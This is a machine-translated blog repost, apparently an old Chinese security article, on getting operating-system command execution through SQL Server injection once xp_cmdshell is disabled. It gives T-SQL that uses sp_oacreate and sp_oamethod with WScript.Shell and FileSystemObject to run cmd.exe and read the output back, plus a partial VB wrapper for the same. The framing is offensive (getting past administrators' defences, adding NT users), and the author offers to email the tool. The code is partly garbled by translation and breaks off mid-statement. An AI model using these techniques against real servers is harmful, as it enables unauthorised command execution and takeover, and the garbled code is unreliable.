No need XP

xiaoxiao2021-03-06  78

There is an article in my blog, introduces the basic principles and some methods about SQL injection. The most interested interest may be a console command to run the operating system using the extended stored procedure xp_cmdshell. This method is also very simple, just use the following SQL statement:

EXEC MASTER.DBO.XP_CMDSHELL 'DIR C: /'

But more and more database administrators have realized potential dangers of this expansion stored procedure, they may delete or change the dynamic link library XPLog70.dll file of the stored procedure, and many people may give up. Because we can't run any CMD commands, it is difficult to view the files, directories, and open services of the other party, and cannot add NT users.

I have studied this, and later I found that even if xp_cmdshell is not available, it is possible to run the CMD on the server and get the result of the result. Here you need to use several system stored procedures for SQL servers: sp_oacreate, sp_oAgetProperty and SP_OAMETHOD. The premise is Wscript.Shell and scripting.FileSystemObject on the server available. Sp_oacreate creates an OLE object instance on the Microsoft® SQL ServerTM instance. Syntax sp_oacreate progid, | clsid, objectToken Output [, context] sp_oagetProperty Gets the properties value of the OLE object. Syntax sp_oagetproperty ObjectToken, PropertyName [, PropertyValue Output] [, index ...] sp_oamethod Call the OLE object. Syntax sp_oamethod ObjectToken, MethodName [, ReturnValue Output] [, [@ParameterName =] Parameter [output] [... n]]]]

Idea:

First create a WScript.Shell on SQL Server, call its Run Method, output the result of cmd.exe execute into a file, then build a scripting.filesystemObject, build a TextStream object, read the temporary file Character, one row added to a temporary table. The following are the appropriate SQL statements CREATE TABLE mytmp (info VARCHAR (400), ID IDENTITY (1, 1) NOT NULL) DECLARE @shell INTDECLARE @fso INTDECLARE @file INTDECLARE @isEnd BITDECLARE @out VARCHAR (400) EXEC sp_oacreate 'wscript. Shell ', @ shell outputexec sp_oamethod @ shell,' run ', null,' cmd.exe / c Dir C: /> C: /TEMP.TXT ',' 0 ',' TRUE '- Note Run's parameter TRUE This parameter must be used for the result of the wait for the run, and this parameter must be used for a long time command similar to PING. EXEC sp_oacreate 'scripting.filesystemobject', @ fso outputEXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: /temp.txt' - because of fso OpenTextFile method returns a textstream objects, so in this case it is @file an object token WHILE @shell> 0BEGINEXEC sp_oamethod @ file, 'Readline', @ out outINSERT INTO mYTMP (info) VALUES (@out) EXEC sp_oagetproperty @ file, 'AtEndOfStream', @ isEnd outIF @ isEnd = 1 BREAKELSE CONTINUEENDDROP TABLE mYTMP Please refer to the SQL Server online book about: sp_oacreate, sp_oamethod and sp_oagetproperty, and article about FSO, WScript, if you need this software, please leave an email address, I have sent the address.

The following is a VB source code for implementation: 'STRCOMMAND: The command that needs to be called, such as "DIR C: /"' strshell: Calling shell programs, can be "cmd.exe / c" or "command.com / c" "Pivate Function wsShellExec (ByVal strCommand As String, ByVal strShell As String) As StringOn Error GoTo errhandle: Dim rsShell As New ADODB.Recordset Dim strResult As String objConn.Execute" DROP TABLE cmds0001 "objConn.Execute" CREATE TABLE cmds0001 (Info varchar (400), ID iNT IDENTITY (1, 1) NOT NULL) "Dim strScmdSQL As String strScmdSQL =" declare @shell int "& vbCrLf strScmdSQL = strScmdSQL &" declare @fso int "& vbCrLf strScmdSQL = strScmdSQL &" declare @file int "& vbCrLf strScmdSQL = strScmdSQL &" declare @isend bit "& vbCrLf strScmdSQL = strScmdSQL &" declare @out varchar (400) "& vbCrLf strScmdSQL = strScmdSQL &" exec sp_oacreate 'wscript.shell', @ shell output "& vbCrLf Strscmdsql = strscmdsql & "exec sp_oamethod @ shell, 'run', null, '" & strshell & "& trimmman" & "c: /bootlog.txt', '0', 'True'" & Vbcrlf strandscmdsql = strscmd SQL & "exec sp_oacreate 'scripting.filesystemobject', @ fso output" & vbCrLf strScmdSQL = strScmdSQL & "exec sp_oamethod @ fso, 'opentextfile', @ file out, 'c: /BOOTLOG.TXT'" & vbCrLf strScmdSQL = strScmdSQL & "While @Shell> 0" & vbcrlf strascmdsql = strscmdsql & "begin" & vbcrlf strascmdsql = strscmdsql & "

转载请注明原文地址:https://www.9cbs.com/read-121024.html

New Post(0)